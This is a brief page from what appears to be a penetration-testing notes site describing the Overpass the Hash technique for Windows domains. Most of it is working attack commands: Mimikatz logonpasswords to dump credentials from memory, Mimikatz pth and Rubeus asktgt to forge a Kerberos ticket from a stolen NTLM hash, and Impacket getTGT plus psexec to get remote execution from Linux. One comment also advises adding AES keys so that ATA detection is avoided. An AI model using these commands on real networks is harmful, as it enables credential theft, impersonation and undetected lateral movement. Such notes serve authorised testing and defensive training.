Overpass the Hash

In comparison to Passing the Hash, where we take a user's NTLM hash and authenticate via NTLM, we take the NTLM and use it to give ourselves a Kerberos TGT which can then allow us to access another service or machine as that user.

This lateral movement technique can be especially useful in environments where NTLM authentication is not allowed.

With the hash of a user we can use Overpass the Hash to authenticate to any machine or service where the user has permissions to use.

Steps

Step 1 - Obtain Hashes of Your Target User

Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

Step 2 - Overpassing the Hash

Mimikatz

# You may need the AES256 and AES128 keys too if the DC is running ATA, this way detection is avoided
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm> /run:powershell.exe [/aes256:<aes256_hash> /aes128:<aes128_hash>]"'

Can also do it with Rubeus.exe (no Admin rights necessary)

.\Rubeus.exe asktgt /domain:<domain> /user:<user> /rc4:<ntlm> /ptt

From Linux

python getTGT.py <domain>/<user> -hashes :<ntlm>
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k <domain> -no-pass

PreviousMSSQL Server Trust Abuse NextPentesting With Python

Last updated 3 years ago

hashtagSteps

hashtagStep 1 - Obtain Hashes of Your Target User

hashtagStep 2 - Overpassing the Hash

Steps

Step 1 - Obtain Hashes of Your Target User

Step 2 - Overpassing the Hash